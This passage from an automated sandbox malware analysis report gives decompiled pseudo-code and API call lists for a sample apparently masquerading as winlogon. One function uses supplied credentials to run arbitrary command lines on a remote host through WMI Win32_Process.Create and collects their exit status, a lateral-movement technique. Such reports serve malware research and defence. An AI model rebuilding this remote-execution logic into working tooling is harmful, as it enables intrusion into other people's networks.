						_t88 = _t87 - _t108;
						_push(_t114);
						__eflags =  *((char*)(_t134 + _t88 - 0x505)) - 0x5c;
						if( *((char*)(_t134 + _t88 - 0x505)) != 0x5c) {
							_t128 =  &_v1288 - 1;
							__eflags = _t128;
							do {
								_t75 =  *(_t128 + 1);
								_t128 = _t128 + 1;
								__eflags = _t75;
							} while (_t75 != 0);
							_t76 = "\\"; // 0x5c
							 *_t128 = _t76;
						}
						_t109 = _v1568;
						_t132 = _t109;
						do {
							_t64 =  *_t109;
							_t109 = _t109 + 1;
							__eflags = _t64;
						} while (_t64 != 0);
						_t110 = _t109 - _t132;
						_t116 =  &_v1288 - 1;
						__eflags = _t116;
						do {
							_t65 =  *(_t116 + 1);
							_t116 = _t116 + 1;
							__eflags = _t65;
						} while (_t65 != 0);
						_t90 = _t110 >> 2;
						memcpy(_t116, _t132, _t90 << 2);
						_t93 = _t110 & 0x00000003;
						__eflags = _t93;
						memcpy(_t132 + _t90 + _t90, _t132, _t93);
						_t95 =  &_v1288;
						_t111 = _t95 + 1;
						do {
							_t68 =  *_t95;
							_t95 = _t95 + 1;
							__eflags = _t68;
						} while (_t68 != 0);
						__eflags = _t95 - _t111 - 0x3ff;
						if(_t95 - _t111 < 0x3ff) {
							_t112 =  &_v1288;
							_t133 = _t112;
							do {
								_t71 =  *_t112;
								_t112 = _t112 + 1;
								__eflags = _t71;
							} while (_t71 != 0);
							_t113 = _t112 - _t133;
							_t79 = _t78 - 1;
							asm("o16 nop [eax+eax]");
							do {
								_t72 =  *(_t79 + 1);
								_t79 = _t79 + 1;
								__eflags = _t72;
							} while (_t72 != 0);
							_t100 = _t113 >> 2;
							memcpy(_t79, _t133, _t100 << 2);
							_t103 = _t113 & 0x00000003;
							__eflags = _t103;
							memcpy(_t133 + _t100 + _t100, _t133, _t103);
						}
						__eflags = _v8 ^ _t134;
						return E00D6ABE4(_v8 ^ _t134);
					}
				} else {
					L3:
					return E00D6ABE4(_v8 ^ _t134);
				}
			}














































    0x00d65970
    0x00d65979
    0x00d65980
    0x00d6598a
    0x00d65994
    0x00d65996
    0x00d6599e
    0x00d659b7
    0x00d659c0
    0x00d659c2
    0x00d659c2
    0x00d659c5
    0x00d659d5
    0x00d659dc
    0x00d659fe
    0x00d65a03
    0x00d65a16
    0x00d65a1c
    0x00d65a27
    0x00d65a31
    0x00d65a44
    0x00d65a5b
    0x00d65a66
    0x00d65a6b
    0x00d65a71
    0x00d65a7e
    0x00d65a81
    0x00d65a81
    0x00d65a83
    0x00d65a84
    0x00d65a84
    0x00d65a97
    0x00d65a9f
    0x00d65aa1
    0x00000000
    0x00d65aa7
    0x00d65aa7
    0x00d65aad
    0x00d65ab0
    0x00d65ab0
    0x00d65ab2
    0x00d65ab3
    0x00d65ab3
    0x00d65ab7
    0x00d65ab9
    0x00d65aba
    0x00d65ac2
    0x00d65aca
    0x00d65aca
    0x00d65ad0
    0x00d65ad0
    0x00d65ad3
    0x00d65ad6
    0x00d65ad6
    0x00d65ada
    0x00d65ae0
    0x00d65ae0
    0x00d65ae3
    0x00d65ae9
    0x00d65af0
    0x00d65af0
    0x00d65af2
    0x00d65af3
    0x00d65af3
    0x00d65afd
    0x00d65aff
    0x00d65aff
    0x00d65b00
    0x00d65b00
    0x00d65b03
    0x00d65b04
    0x00d65b04
    0x00d65b0a
    0x00d65b0d
    0x00d65b11
    0x00d65b11
    0x00d65b14
    0x00d65b16
    0x00d65b1c
    0x00d65b20
    0x00d65b20
    0x00d65b22
    0x00d65b23
    0x00d65b23
    0x00d65b29
    0x00d65b2f
    0x00d65b31
    0x00d65b37
    0x00d65b40
    0x00d65b40
    0x00d65b42
    0x00d65b43
    0x00d65b43
    0x00d65b47
    0x00d65b49
    0x00d65b4a
    0x00d65b50
    0x00d65b50
    0x00d65b53
    0x00d65b54
    0x00d65b54
    0x00d65b5c
    0x00d65b5f
    0x00d65b63
    0x00d65b63
    0x00d65b66
    0x00d65b66
    0x00d65b72
    0x00d65b7d
    0x00d65b7d
    0x00d659df
    0x00d659df
    0x00d659ef
    0x00d659ef

    APIs
    • GetVersionExW.KERNEL32(00000114), ref: 00D659AF
      • Part of subcall function 00D642C0: CoTaskMemFree.OLE32(00000000), ref: 00D6434D
      • Part of subcall function 00D642C0: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002E,00000001), ref: 00D6438B
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • __Stoull.NTSTC_LIBCMT ref: 00D65A16
      • Part of subcall function 00D62D30: GetCurrentProcess.KERNEL32 ref: 00D62D75
      • Part of subcall function 00D62D30: OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62DA2
      • Part of subcall function 00D62D30: wsprintfW.USER32 ref: 00D62E8F
    • __Stoull.NTSTC_LIBCMT ref: 00D65A5B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D64140, Relevance: 4.6, APIs: 3, Instructions: 79encryption
    C-Code - Quality: 55%
    			E00D64140(intOrPtr __ecx, int __edx, void* __esi) {
				long* _v8;
				intOrPtr _v12;
				signed int _v20;
				BYTE* _v24;
				long** _t25;
				int _t27;
				signed int _t31;
				int _t33;
				intOrPtr _t35;
				BYTE* _t41;
				int _t43;
				void* _t48;

				_v12 = __ecx;
				_t33 = __edx;
				if(__ecx == 0 || __edx == 0) {
					return 0;
				} else {
					_push(__edx);
					_t41 = E00D702C9(__ecx);
					_v24 = _t41;
					if(_t41 != 0) {
						_t25 =  &_v8;
						_v8 = 0;
						__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000040); // executed
						if(_t25 != 0) {
							_t27 = CryptGenRandom(_v8, __edx, _t41);
							CryptReleaseContext(_v8, 0);
							if(_t27 != 0) {
								if(_t33 != 0) {
									_t35 = _v12;
									_v20 = 0x19;
									_t43 = _t33;
									_t48 = _t41 - _t35;
									do {
										_t31 =  *(_t48 + _t35) & 0x000000ff;
										_t35 = _t35 + 1;
										 *((char*)(_t35 - 1)) = _t31 % _v20 + 0x61;
										_t43 = _t43 - 1;
									} while (_t43 != 0);
									_t41 = _v24;
								}
								 *((char*)(_v12 + _t33)) = 0;
							}
						}
						if(_t41 != 0xffffffff && _t41 != 0xcccccccc) {
							E00D7009A(_t41);
						}
					}
					return 0;
				}
			}















    0x00d64148
    0x00d6414c
    0x00d64150
    0x00d64216
    0x00d6415e
    0x00d6415f
    0x00d64165
    0x00d6416a
    0x00d6416f
    0x00d64180
    0x00d64183
    0x00d6418b
    0x00d64193
    0x00d6419b
    0x00d641a8
    0x00d641b0
    0x00d641b4
    0x00d641b6
    0x00d641bd
    0x00d641c4
    0x00d641c6
    0x00d641d0
    0x00d641d0
    0x00d641d4
    0x00d641df
    0x00d641e2
    0x00d641e2
    0x00d641e7
    0x00d641e7
    0x00d641ed
    0x00d641ed
    0x00d641f1
    0x00d641f5
    0x00d64200
    0x00d64205
    0x00d641f5
    0x00d6420f
    0x00d6420f

    APIs
    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,?,?,?,00D63E8B), ref: 00D6418B
    • CryptGenRandom.ADVAPI32(00000000,00000003,00000000,00000000,?,?,?,00D63E8B), ref: 00D6419B
    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00D63E8B), ref: 00D641A8
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D74EF7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30time
    APIs
      • Part of subcall function 00D74C37: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C,00000000), ref: 00D74C97
    • GetSystemTimeAsFileTime.KERNEL32(00000000,00D70075), ref: 00D74F36
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6A6F0, Relevance: 3.0, APIs: 2, Instructions: 25
    C-Code - Quality: 100%
    			E00D6A6F0(long __ecx, void** __edx) {
				void* _t4;
				void* _t8;
				void** _t9;

				_t8 = __ecx;
				_t9 = __edx;
				if(__ecx == 0 || __edx == 0) {
					L4:
					return 0;
				} else {
					_t4 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
					if(_t4 == 0) {
						goto L4;
					} else {
						_t9[1] = _t8;
						 *_t9 = _t4;
						return 1;
					}
				}
			}






    0x00d6a6f2
    0x00d6a6f4
    0x00d6a6f8
    0x00d6a720
    0x00d6a723
    0x00d6a6fe
    0x00d6a708
    0x00d6a710
    0x00000000
    0x00d6a712
    0x00d6a712
    0x00d6a715
    0x00d6a71e
    0x00d6a71e
    0x00d6a710

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00D6AB56,?,?,?,?,?,?,00D631A7,?), ref: 00D6A701
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6A708
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6B598, Relevance: 1.5, APIs: 1, Instructions: 3
    C-Code - Quality: 100%
    			E00D6B598() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00D6B5A4); // executed
				return _t1;
			}




    0x00d6b59d
    0x00d6b5a3

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_0000B5A4), ref: 00D6B59D
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D645D0, Relevance: 81.0, APIs: 37, Strings: 9, Instructions: 467com

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 58 d645d0-d6463d call d7d900 CoInitializeEx 61 d64c07-d64c24 call d6abe4 58->61 62 d64643-d64656 CoInitializeSecurity 58->62 64 d64658-d6465d 62->64 65 d64663-d64715 CredUIParseUserNameW LocalAlloc SysAllocString * 3 SysStringLen * 3 CoCreateInstance 62->65 64->65 69 d64c01 CoUninitialize 64->69 67 d6471b-d64793 SysAllocString * 3 SysFreeString 65->67 68 d64be6-d64bfb SysFreeString * 3 LocalFree 65->68 67->68 71 d64799-d647b4 CoSetProxyBlanket 67->71 68->69 69->61 72 d64bce-d64be1 71->72 73 d647ba-d647df call d6abfa 71->73 72->68 77 d647e1-d647fb call d6b9c0 73->77 78 d647fd 73->78 80 d647ff-d6480e 77->80 78->80 82 d64810-d64815 call d6b9a0 80->82 83 d6481a-d64839 call d6abfa 80->83 82->83 87 d64857 83->87 88 d6483b-d64855 call d6b9c0 83->88 89 d64859-d64865 87->89 88->89 92 d64871-d6489c InterlockedDecrement 89->92 93 d64867-d6486c call d6b9a0 89->93 96 d6489e-d648a2 92->96 97 d648cf-d648e2 InterlockedDecrement 92->97 93->92 100 d648ad-d648b2 96->100 101 d648a4-d648a7 SysFreeString 96->101 98 d64915-d64936 CoSetProxyBlanket 97->98 99 d648e4-d648e8 97->99 98->72 106 d6493c-d64944 98->106 102 d648ea-d648ed SysFreeString 99->102 103 d648f3-d648f8 99->103 104 d648b4-d648bd call d6abf5 100->104 105 d648c4-d648cc call d6ac32 100->105 101->100 102->103 108 d648fa-d64903 call d6abf5 103->108 109 d6490a-d64912 call d6ac32 103->109 104->105 105->97 111 d64bc8-d64bca 106->111 112 d6494a-d64998 SysAllocString * 2 106->112 108->109 109->98 111->72 120 d6499e-d649c7 112->120 121 d64bb2-d64bc2 SysFreeString * 2 112->121 123 d649cd-d649ee 120->123 124 d64ba6-d64bad 120->124 121->111 126 d64b9a-d64ba1 123->126 127 d649f4-d64a32 SysAllocString 123->127 124->121 126->124 129 d64b77-d64b94 SysFreeString VariantClear 127->129 130 d64a38-d64a6f 127->130 129->126 130->129 133 d64a75-d64a9f 130->133 135 d64b62-d64b72 VariantClear 133->135 136 d64aa5-d64aad 133->136 135->129 137 d64ab0-d64ad6 136->137 139 d64ad8-d64afe 137->139 140 d64b4e-d64b56 137->140 143 d64b00-d64b34 139->143 144 d64b36-d64b48 VariantClear * 2 139->144 140->137 145 d64b5c 140->145 143->144 144->140 145->135
    C-Code - Quality: 25%
    			E00D645D0(void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, char _a4, char _a8, intOrPtr* _a12) {
				long _v8;
				char _v16;
				signed int _v20;
				short _v1060;
				char _v2408;
				char _v4460;
				void* _v4464;
				void* _v4468;
				void _v4472;
				void* _v4476;
				void* _v4480;
				void* _v4484;
				void* _v4488;
				intOrPtr _v4492;
				void* _v4496;
				void* _v4500;
				long _v4504;
				char _v4508;
				long _v4512;
				intOrPtr* _v4516;
				intOrPtr _v4524;
				char _v4532;
				intOrPtr _v4540;
				char _v4548;
				short _v4556;
				char _v4564;
				intOrPtr _v4572;
				char _v4580;
				signed int _t145;
				signed int _t146;
				intOrPtr* _t149;
				void* _t154;
				void _t156;
				intOrPtr _t159;
				intOrPtr _t160;
				void _t161;
				intOrPtr _t162;
				long* _t164;
				void* _t172;
				void* _t173;
				void* _t174;
				intOrPtr* _t175;
				long _t177;
				intOrPtr* _t181;
				long _t186;
				intOrPtr _t189;
				void _t190;
				intOrPtr* _t191;
				void* _t192;
				intOrPtr* _t195;
				intOrPtr* _t197;
				intOrPtr* _t199;
				intOrPtr* _t201;
				intOrPtr _t204;
				intOrPtr* _t205;
				void* _t206;
				intOrPtr* _t210;
				intOrPtr* _t212;
				intOrPtr* _t214;
				intOrPtr* _t218;
				intOrPtr* _t220;
				intOrPtr* _t231;
				intOrPtr _t234;
				intOrPtr _t238;
				long _t248;
				intOrPtr* _t250;
				intOrPtr _t251;
				intOrPtr* _t252;
				intOrPtr* _t255;
				void* _t261;
				intOrPtr* _t262;
				intOrPtr* _t266;
				intOrPtr* _t278;
				void _t283;
				char _t294;
				intOrPtr* _t296;
				intOrPtr* _t298;
				intOrPtr* _t299;
				long _t300;
				char _t302;
				intOrPtr _t304;
				void* _t305;
				intOrPtr* _t306;
				intOrPtr* _t308;
				intOrPtr* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				void* _t314;

				E00D7D900();
				_t145 =  *0xd88004; // 0x276b9783
				_t146 = _t145 ^ _t310;
				_v20 = _t146;
				 *[fs:0x0] =  &_v16;
				_t302 = __edx;
				_v4488 = __edx;
				_v4492 = __ecx;
				_t248 = 0;
				_t294 = _a4;
				_v4480 = _a8;
				_t149 = _a12;
				_v4484 = _t294;
				_v4516 = _t149;
				_v4512 = 0;
				__imp__CoInitializeEx(0, 0, _t146, __edi, __esi, __ebx,  *[fs:0x0], E00D7E2DA, 0xffffffff); // executed
				if(_t149 >= 0) {
					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 2, 0, 0, 0); // executed
					if(_t149 >= 0 || _t149 == 0x80010119) {
						_v4504 = _t248;
						__imp__CredUIParseUserNameW(_t302,  &_v4460, 0x201,  &_v2408, 0x151); // executed
						_t154 = LocalAlloc(0x40, 0x1c);
						_t250 = __imp__#2;
						_v4468 = _t154;
						_t156 =  *_t250( &_v4460);
						_v4472 = _t156;
						_t304 =  *_t250(_t294);
						_t159 =  *_t250( &_v2408);
						_t296 = __imp__#7;
						_t251 = _t159;
						_t160 =  *_t296(_t304);
						_t261 = _v4468;
						 *((intOrPtr*)(_t261 + 0x10)) = _t304;
						_t305 = _t261;
						 *((intOrPtr*)(_t261 + 0x14)) = _t160;
						_t161 = _v4472;
						 *_t305 = _t161;
						_t162 =  *_t296(_t161);
						 *((intOrPtr*)(_t305 + 4)) = _t162;
						 *((intOrPtr*)(_t305 + 8)) = _t251;
						 *((intOrPtr*)(_t305 + 0xc)) =  *_t296(_t251);
						_t164 =  &_v4504;
						 *((intOrPtr*)(_t305 + 0x18)) = 2;
						__imp__CoCreateInstance(0xd7f4b8, 0, 1, 0xd7f3e8, _t164); // executed
						_t252 = __imp__#6;
						if(_t164 >= 0) {
							wsprintfW( &_v1060, L"\\\\%s\\root\\CIMV2", _v4492);
							_t306 = __imp__#2;
							_t312 = _t311 + 0xc;
							_t172 =  *_t306( &_v1060);
							_t297 = _t172;
							_t173 =  *_t306(_v4488);
							__imp__#2(_v4484);
							_t262 = _v4504;
							_v4464 = 0;
							_t174 =  *((intOrPtr*)( *_t262 + 0xc))(_t262, _t172, _t173, _t173, 0, 0, 0, 0,  &_v4464);
							_t252 = __imp__#6; // 0x76fd3f8a
							_t305 = _v4468;
							if(_t174 >= 0) {
								__imp__CoSetProxyBlanket(_v4464, 0xffffffff, 0xffffffff, 0xffffffff, 6, 3, _t305, 0);
								_t321 = _t174;
								if(_t174 >= 0) {
									_v4476 = 0;
									_t308 = E00D6ABFA(_t252, _t262, _t297, _t305, _t321, 0xc);
									_t313 = _t312 + 4;
									_v4508 = _t308;
									_v8 = 0;
									if(_t308 == 0) {
										_t308 = 0;
										__eflags = 0;
									} else {
										 *((intOrPtr*)(_t308 + 4)) = 0;
										 *(_t308 + 8) = 1;
										 *_t308 = E00D6B9C0(_t252, _t297, _t308, "Select * From Win32_ProcessStopTrace");
									}
									_v8 = 0xffffffff;
									_v4508 = _t308;
									_t323 = _t308;
									if(_t308 == 0) {
										E00D6B9A0(0x8007000e);
									}
									_v8 = 1;
									_t298 = E00D6ABFA(_t252, _t262, _t297, _t308, _t323, 0xc);
									_t314 = _t313 + 4;
									_v4472 = _t298;
									_v8 = 2;
									if(_t298 == 0) {
										_t298 = 0;
										__eflags = 0;
									} else {
										 *((intOrPtr*)(_t298 + 4)) = 0;
										 *(_t298 + 8) = 1;
										 *_t298 = E00D6B9C0(_t252, _t298, _t308, "WQL");
									}
									_v8 = 1;
									_v4472 = _t298;
									if(_t298 == 0) {
										E00D6B9A0(0x8007000e);
									}
									_v8 = 3;
									_t181 = _v4464;
									 *((intOrPtr*)( *_t181 + 0x58))(_t181,  *_t298,  *_t308, 0x30, 0,  &_v4476);
									_t57 = _t298 + 8; // 0x8
									if(InterlockedDecrement(_t57) == 0) {
										_t238 =  *_t298;
										if(_t238 != 0) {
											 *_t252(_t238);
											 *_t298 = 0;
										}
										_t239 =  *((intOrPtr*)(_t298 + 4));
										if( *((intOrPtr*)(_t298 + 4)) != 0) {
											E00D6ABF5(_t239);
											_t314 = _t314 + 4;
											 *((intOrPtr*)(_t298 + 4)) = 0;
										}
										_push(0xc);
										E00D6AC32(_t298);
										_t314 = _t314 + 8;
									}
									_t60 = _t308 + 8; // 0x8
									_v8 = 0xffffffff;
									_t186 = InterlockedDecrement(_t60);
									if(_t186 == 0) {
										_t234 =  *_t308;
										if(_t234 != 0) {
											 *_t252(_t234);
											 *_t308 = 0;
										}
										_t235 =  *((intOrPtr*)(_t308 + 4));
										if( *((intOrPtr*)(_t308 + 4)) != 0) {
											E00D6ABF5(_t235);
											_t314 = _t314 + 4;
											 *((intOrPtr*)(_t308 + 4)) = 0;
										}
										_push(0xc);
										_t186 = E00D6AC32(_t308);
									}
									_t305 = _v4468;
									__imp__CoSetProxyBlanket(_v4476, 0xffffffff, 0xffffffff, 0xffffffff, 6, 3, _t305, 0);
									if(_t186 >= 0) {
										_t266 = _v4476;
										if(_t266 != 0) {
											_t299 = __imp__#2;
											_t189 =  *_t299(L"Create");
											_v4492 = _t189;
											_t190 =  *_t299(L"Win32_Process");
											_t283 = _t190;
											_v4488 = 0;
											_t191 = _v4464;
											_v4472 = _t283;
											_t192 =  *((intOrPtr*)( *_t191 + 0x18))(_t191, _t283, 0, 0,  &_v4488, 0);
											_t252 = __imp__#6;
											if(_t192 >= 0) {
												_t195 = _v4488;
												_push(0);
												_push( &_v4484);
												_push(0);
												_push(_v4492);
												_v4484 = 0;
												_push(_t195);
												if( *((intOrPtr*)( *_t195 + 0x4c))() >= 0) {
													_t199 = _v4484;
													_push( &_v4496);
													_v4496 = 0;
													_push(0);
													_push(_t199);
													if( *((intOrPtr*)( *_t199 + 0x3c))() >= 0) {
														_v4532 = 8;
														_t204 =  *_t299(_v4480);
														_v4524 = _t204;
														_t205 = _v4496;
														_t206 =  *((intOrPtr*)( *_t205 + 0x14))(_t205, L"CommandLine", 0,  &_v4532, 0);
														_t309 = __imp__#9;
														if(_t206 >= 0) {
															_t212 = _v4464;
															_push(0);
															_push( &_v4480);
															_push(_v4496);
															_v4480 = 0;
															_push(0);
															_push(0);
															_push(_v4492);
															_push(_v4472);
															_push(_t212);
															if( *((intOrPtr*)( *_t212 + 0x60))() >= 0) {
																_t214 = _v4480;
																_push(0);
																_push(0);
																_push( &_v4580);
																_push(0);
																_v4508 = 0;
																_push(L"ProcessId");
																_push(_t214);
																if( *((intOrPtr*)( *_t214 + 0x10))() >= 0) {
																	_t255 = _v4516;
																	_t300 = 0;
																	do {
																		_t220 = _v4476;
																		 *((intOrPtr*)( *_t220 + 0x10))(_t220, 0xffffffff, 1,  &_v4500,  &_v4508);
																		_t278 = _v4500;
																		if(_t278 != 0) {
																			 *((intOrPtr*)( *_t278 + 0x10))(_t278, L"ProcessId", 0,  &_v4548, 0, 0);
																			if(_v4540 == _v4572) {
																				_t231 = _v4500;
																				_v4512 = 1;
																				 *((intOrPtr*)( *_t231 + 0x10))(_t231, L"ExitStatus", 0,  &_v4564, 0, 0);
																				_t300 = 1;
																				 *_t255 = _v4556;
																			}
																			 *_t309( &_v4548);
																			 *_t309( &_v4564);
																			_t278 = _v4500;
																		}
																		 *((intOrPtr*)( *_t278 + 8))(_t278);
																	} while (_t300 == 0);
																	_t252 = __imp__#6;
																}
																 *_t309( &_v4580);
																_t218 = _v4480;
																 *((intOrPtr*)( *_t218 + 8))(_t218);
															}
														}
														 *_t252(_v4524);
														 *_t309( &_v4532);
														_t210 = _v4496;
														 *((intOrPtr*)( *_t210 + 8))(_t210);
														_t305 = _v4468;
													}
													_t201 = _v4484;
													 *((intOrPtr*)( *_t201 + 8))(_t201);
												}
												_t197 = _v4488;
												 *((intOrPtr*)( *_t197 + 8))(_t197);
											}
											 *_t252(_v4492);
											 *_t252(_v4472);
											_t266 = _v4476;
										}
										 *((intOrPtr*)( *_t266 + 8))(_t266);
									}
								}
								_t175 = _v4464;
								 *((intOrPtr*)( *_t175 + 8))(_t175);
								_t177 = _v4504;
								 *((intOrPtr*)( *_t177 + 8))(_t177);
							}
						}
						 *_t252( *((intOrPtr*)(_t305 + 8)));
						 *_t252( *((intOrPtr*)(_t305 + 0x10)));
						 *_t252( *_t305);
						LocalFree(_t305);
						_t248 = _v4512;
					}
					__imp__CoUninitialize();
				}
				 *[fs:0x0] = _v16;
				return E00D6ABE4(_v20 ^ _t310);
			}





























































































    0x00d645e6
    0x00d645eb
    0x00d645f0
    0x00d645f2
    0x00d645fc
    0x00d64602
    0x00d64604
    0x00d6460a
    0x00d64613
    0x00d64615
    0x00d64619
    0x00d6461f
    0x00d64623
    0x00d64629
    0x00d6462f
    0x00d64635
    0x00d6463d
    0x00d6464e
    0x00d64656
    0x00d6466e
    0x00d64682
    0x00d6468c
    0x00d64692
    0x00d64698
    0x00d646a5
    0x00d646a8
    0x00d646b0
    0x00d646b9
    0x00d646bb
    0x00d646c1
    0x00d646c4
    0x00d646c6
    0x00d646cc
    0x00d646cf
    0x00d646d1
    0x00d646d4
    0x00d646db
    0x00d646dd
    0x00d646e0
    0x00d646e3
    0x00d646e8
    0x00d646eb
    0x00d64700
    0x00d64707
    0x00d6470d
    0x00d64715
    0x00d6472d
    0x00d64733
    0x00d6473f
    0x00d64743
    0x00d6474b
    0x00d6474d
    0x00d64757
    0x00d6475d
    0x00d64774
    0x00d64782
    0x00d64785
    0x00d6478b
    0x00d64793
    0x00d647ac
    0x00d647b2
    0x00d647b4
    0x00d647bc
    0x00d647cb
    0x00d647cd
    0x00d647d0
    0x00d647d6
    0x00d647df
    0x00d647fd
    0x00d647fd
    0x00d647e1
    0x00d647e6
    0x00d647ed
    0x00d647f9
    0x00d647f9
    0x00d647ff
    0x00d64806
    0x00d6480c
    0x00d6480e
    0x00d64815
    0x00d64815
    0x00d6481c
    0x00d64828
    0x00d6482a
    0x00d6482d
    0x00d64833
    0x00d64839
    0x00d64857
    0x00d64857
    0x00d6483b
    0x00d64840
    0x00d64847
    0x00d64853
    0x00d64853
    0x00d64859
    0x00d6485d
    0x00d64865
    0x00d6486c
    0x00d6486c
    0x00d64877
    0x00d6487b
    0x00d6488d
    0x00d64890
    0x00d6489c
    0x00d6489e
    0x00d648a2
    0x00d648a5
    0x00d648a7
    0x00d648a7
    0x00d648ad
    0x00d648b2
    0x00d648b5
    0x00d648ba
    0x00d648bd
    0x00d648bd
    0x00d648c4
    0x00d648c7
    0x00d648cc
    0x00d648cc
    0x00d648cf
    0x00d648d2
    0x00d648da
    0x00d648e2
    0x00d648e4
    0x00d648e8
    0x00d648eb
    0x00d648ed
    0x00d648ed
    0x00d648f3
    0x00d648f8
    0x00d648fb
    0x00d64900
    0x00d64903
    0x00d64903
    0x00d6490a
    0x00d6490d
    0x00d64912
    0x00d64915
    0x00d6492e
    0x00d64936
    0x00d6493c
    0x00d64944
    0x00d6494a
    0x00d64955
    0x00d6495c
    0x00d64962
    0x00d64966
    0x00d64968
    0x00d64972
    0x00d64987
    0x00d6498d
    0x00d64990
    0x00d64998
    0x00d6499e
    0x00d649aa
    0x00d649ac
    0x00d649ad
    0x00d649af
    0x00d649b5
    0x00d649c1
    0x00d649c7
    0x00d649cd
    0x00d649d9
    0x00d649da
    0x00d649e4
    0x00d649e8
    0x00d649ee
    0x00d649ff
    0x00d64a06
    0x00d64a0a
    0x00d64a16
    0x00d64a27
    0x00d64a2a
    0x00d64a32
    0x00d64a38
    0x00d64a44
    0x00d64a46
    0x00d64a47
    0x00d64a4d
    0x00d64a59
    0x00d64a5b
    0x00d64a5d
    0x00d64a63
    0x00d64a69
    0x00d64a6f
    0x00d64a75
    0x00d64a81
    0x00d64a83
    0x00d64a85
    0x00d64a86
    0x00d64a88
    0x00d64a94
    0x00d64a99
    0x00d64a9f
    0x00d64aa5
    0x00d64aab
    0x00d64ab0
    0x00d64ab0
    0x00d64acb
    0x00d64ace
    0x00d64ad6
    0x00d64aed
    0x00d64afe
    0x00d64b00
    0x00d64b1b
    0x00d64b25
    0x00d64b2f
    0x00d64b34
    0x00d64b34
    0x00d64b3d
    0x00d64b46
    0x00d64b48
    0x00d64b48
    0x00d64b51
    0x00d64b54
    0x00d64b5c
    0x00d64b5c
    0x00d64b69
    0x00d64b6b
    0x00d64b74
    0x00d64b74
    0x00d64a6f
    0x00d64b7d
    0x00d64b86
    0x00d64b88
    0x00d64b91
    0x00d64b94
    0x00d64b94
    0x00d64b9a
    0x00d64ba3
    0x00d64ba3
    0x00d64ba6
    0x00d64baf
    0x00d64baf
    0x00d64bb8
    0x00d64bc0
    0x00d64bc2
    0x00d64bc2
    0x00d64bcb
    0x00d64bcb
    0x00d64936
    0x00d64bce
    0x00d64bd7
    0x00d64bda
    0x00d64be3
